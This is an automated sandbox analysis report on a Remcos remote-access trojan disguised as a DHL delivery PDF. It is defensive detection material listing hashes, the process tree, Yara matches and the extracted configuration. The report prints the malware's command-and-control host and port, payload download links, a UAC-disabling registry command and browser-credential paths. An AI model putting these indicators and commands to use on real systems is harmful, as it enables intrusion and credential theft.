Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe

Overview

General Information

Sample Name:ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
Analysis ID:491719
MD5:3808d4a11cbee20896cca28f9a3bcb9b
SHA1:b3a533d6e00ace2ec0612c9af66c6dd69c5180b3
SHA256:53c2e53d33f80e88b16cce06621f99680e0e5f387315cb81af97cee58080165a
Tags:DHLexegeoPRTRATRemcosRAT
Infos:

Most interesting Screenshot:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Detected Remcos RAT
Multi AV Scanner detection for dropped file
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Allocates memory in foreign processes
Contains functionality to steal Chrome passwords or cookies
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Uses dynamic DNS services
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Creates processes with suspicious names
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Entry point lies outside standard sections
Contains long sleeps (>= 3 min)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Uses reg.exe to modify the Windows registry
Contains functionality to retrieve information about pressed keystrokes
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to simulate mouse events
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe (PID: 6548 cmdline: 'C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe' MD5: 3808D4A11CBEE20896CCA28F9A3BCB9B)
    • mobsync.exe (PID: 1368 cmdline: C:\Windows\System32\mobsync.exe MD5: 44C19378FA529DD88674BAF647EBDC3C)
    • cmd.exe (PID: 7156 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6852 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5048 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 1680 cmdline: reg delete hkcu\Environment /v windir /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • conhost.exe (PID: 5508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Iqzenco.exe (PID: 7112 cmdline: 'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe' MD5: 3808D4A11CBEE20896CCA28F9A3BCB9B)
    • mobsync.exe (PID: 4108 cmdline: C:\Windows\System32\mobsync.exe MD5: 44C19378FA529DD88674BAF647EBDC3C)
  • Iqzenco.exe (PID: 484 cmdline: 'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe' MD5: 3808D4A11CBEE20896CCA28F9A3BCB9B)
    • secinit.exe (PID: 6644 cmdline: C:\Windows\System32\secinit.exe MD5: 174A363BB5A2D88B224546C15DD10906)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Version": "3.1.5 Pro", "Host:Port:Password": "ongod4ever.ddns.net:5652:0", "Assigned name": "ABLE GOD", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-8VTGWT", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Libraries\ocnezqI.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmpREMCOS_RAT_variantsunknownunknown
    • 0x606bc:$str_a1: C:\Windows\System32\cmd.exe
    • 0x60638:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x60638:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x5fc38:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    • 0x60290:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x5f86c:$str_b2: Executing file:
    • 0x60800:$str_b3: GetDirectListeningPort
    • 0x60050:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x603d4:$str_b5: licence_code.txt
    • 0x60278:$str_b7: \update.vbs
    • 0x5f8dc:$str_b9: Downloaded file:
    • 0x5f8a8:$str_b10: Downloading file:
    • 0x5f890:$str_b12: Failed to upload file:
    • 0x607c8:$str_b13: StartForward
    • 0x607e8:$str_b14: StopForward
    • 0x60220:$str_b15: fso.DeleteFile "
    • 0x601b4:$str_b16: On Error Resume Next
    • 0x60250:$str_b17: fso.DeleteFolder "
    • 0x5f880:$str_b18: Uploaded file:
    • 0x5f91c:$str_b19: Unable to delete:
    • 0x601e8:$str_b20: while fso.FileExists("
    00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmpREMCOS_RAT_variantsunknownunknown
      • 0x606bc:$str_a1: C:\Windows\System32\cmd.exe
      • 0x60638:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x60638:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x5fc38:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x60290:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x5f86c:$str_b2: Executing file:
      • 0x60800:$str_b3: GetDirectListeningPort
      • 0x60050:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x603d4:$str_b5: licence_code.txt
      • 0x60278:$str_b7: \update.vbs
      • 0x5f8dc:$str_b9: Downloaded file:
      • 0x5f8a8:$str_b10: Downloading file:
      • 0x5f890:$str_b12: Failed to upload file:
      • 0x607c8:$str_b13: StartForward
      • 0x607e8:$str_b14: StopForward
      • 0x60220:$str_b15: fso.DeleteFile "
      • 0x601b4:$str_b16: On Error Resume Next
      • 0x60250:$str_b17: fso.DeleteFolder "
      • 0x5f880:$str_b18: Uploaded file:
      • 0x5f91c:$str_b19: Unable to delete:
      • 0x601e8:$str_b20: while fso.FileExists("
      00000005.00000002.938674908.0000000002EA7000.00000004.00000020.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        Click to see the 10 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        22.2.mobsync.exe.50601a02.1.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          22.2.mobsync.exe.50601a02.1.unpackREMCOS_RAT_variantsunknownunknown
          • 0x5d2bc:$str_a1: C:\Windows\System32\cmd.exe
          • 0x5d238:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x5d238:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x5c838:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x5ce90:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x5c46c:$str_b2: Executing file:
          • 0x5d400:$str_b3: GetDirectListeningPort
          • 0x5cc50:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x5cfd4:$str_b5: licence_code.txt
          • 0x5ce78:$str_b7: \update.vbs
          • 0x5c4dc:$str_b9: Downloaded file:
          • 0x5c4a8:$str_b10: Downloading file:
          • 0x5c490:$str_b12: Failed to upload file:
          • 0x5d3c8:$str_b13: StartForward
          • 0x5d3e8:$str_b14: StopForward
          • 0x5ce20:$str_b15: fso.DeleteFile "
          • 0x5cdb4:$str_b16: On Error Resume Next
          • 0x5ce50:$str_b17: fso.DeleteFolder "
          • 0x5c480:$str_b18: Uploaded file:
          • 0x5c51c:$str_b19: Unable to delete:
          • 0x5cde8:$str_b20: while fso.FileExists("
          5.2.mobsync.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            5.2.mobsync.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
            • 0x606bc:$str_a1: C:\Windows\System32\cmd.exe
            • 0x60638:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x60638:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x5fc38:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x60290:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x5f86c:$str_b2: Executing file:
            • 0x60800:$str_b3: GetDirectListeningPort
            • 0x60050:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x603d4:$str_b5: licence_code.txt
            • 0x60278:$str_b7: \update.vbs
            • 0x5f8dc:$str_b9: Downloaded file:
            • 0x5f8a8:$str_b10: Downloading file:
            • 0x5f890:$str_b12: Failed to upload file:
            • 0x607c8:$str_b13: StartForward
            • 0x607e8:$str_b14: StopForward
            • 0x60220:$str_b15: fso.DeleteFile "
            • 0x601b4:$str_b16: On Error Resume Next
            • 0x60250:$str_b17: fso.DeleteFolder "
            • 0x5f880:$str_b18: Uploaded file:
            • 0x5f91c:$str_b19: Unable to delete:
            • 0x601e8:$str_b20: while fso.FileExists("
            26.2.secinit.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 19 entries

              Sigma Overview

              No Sigma rule has matched

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 22.2.mobsync.exe.400000.0.unpackMalware Configuration Extractor: Remcos {"Version": "3.1.5 Pro", "Host:Port:Password": "ongod4ever.ddns.net:5652:0", "Assigned name": "ABLE GOD", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-8VTGWT", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}
              Multi AV Scanner detection for submitted fileShow sources
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeVirustotal: Detection: 26%Perma Link
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeReversingLabs: Detection: 24%
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 22.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.938674908.0000000002EA7000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.827146573.0000000003178000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.939914286.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.827407780.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.851109980.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.850918949.0000000003327000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 1368, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 4108, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: secinit.exe PID: 6644, type: MEMORYSTR
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeReversingLabs: Detection: 24%
              Source: mobsync.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_004170AC FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_00406176 FindFirstFileW,FindNextFileW,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004170AC FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_00406176 FindFirstFileW,FindNextFileW,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0040A3AF FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0040A5CA FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004456A9 FindFirstFileExA,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004077EE __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_00406930 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,

              Networking:

              barindex
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: ongod4ever.ddns.net
              Uses dynamic DNS servicesShow sources
              Source: unknownDNS query: name: ongod4ever.ddns.net
              Source: global trafficTCP traffic: 192.168.2.4:49771 -> 185.140.53.15:5652
              Source: Iqzenco.exe, 00000010.00000003.750864485.00000000007B1000.00000004.00000001.sdmpString found in binary or memory: https://bl30uw.sn.files.1drv.com/y4mGst0byrg6Ub0CK8iKHaximJI4M7D1uUmqxfl02ZpIfKXbkyeYXQLL6P2J6UxS4Yz
              Source: Iqzenco.exe, 00000010.00000003.752060770.00000000007A3000.00000004.00000001.sdmpString found in binary or memory: https://bl30uw.sn.files.1drv.com/y4maOmpRLgEZgKpnLv-hczrMb96VqtMQDZd-m0g51QRpK-v8c65WYNUi2NOLDdGNQiU
              Source: Iqzenco.exe, 00000010.00000003.750846747.00000000007A3000.00000004.00000001.sdmpString found in binary or memory: https://bl30uw.sn.files.1drv.com/y4msI7_EyjC8cs97rdyt7ReCTl2WoedGiqx9hVOiugfpodFj4cXgoX5lAQfrGe41zrt
              Source: Iqzenco.exe, 00000010.00000003.752060770.00000000007A3000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=97429F42E815B766&resid=97429F42E815B766%21166&authkey=AFRFbbm
              Source: unknownDNS traffic detected: queries for: onedrive.live.com
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0041242F Sleep,URLDownloadToFileW,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004126A5 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004089BC GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004126A5 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

              E-Banking Fraud:

              barindex
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 22.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.938674908.0000000002EA7000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.827146573.0000000003178000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.939914286.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.827407780.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.851109980.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.850918949.0000000003327000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 1368, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 4108, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: secinit.exe PID: 6644, type: MEMORYSTR

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 22.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 26.2.secinit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 26.2.secinit.exe.50601a02.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 26.2.secinit.exe.50601a02.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 22.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 26.2.secinit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 22.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 22.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Initial sample is a PE file and has a suspicious nameShow sources
              Source: initial sampleStatic PE information: Filename: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
              Source: 22.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 5.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 26.2.secinit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 5.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 26.2.secinit.exe.50601a02.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 5.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 26.2.secinit.exe.50601a02.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 5.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
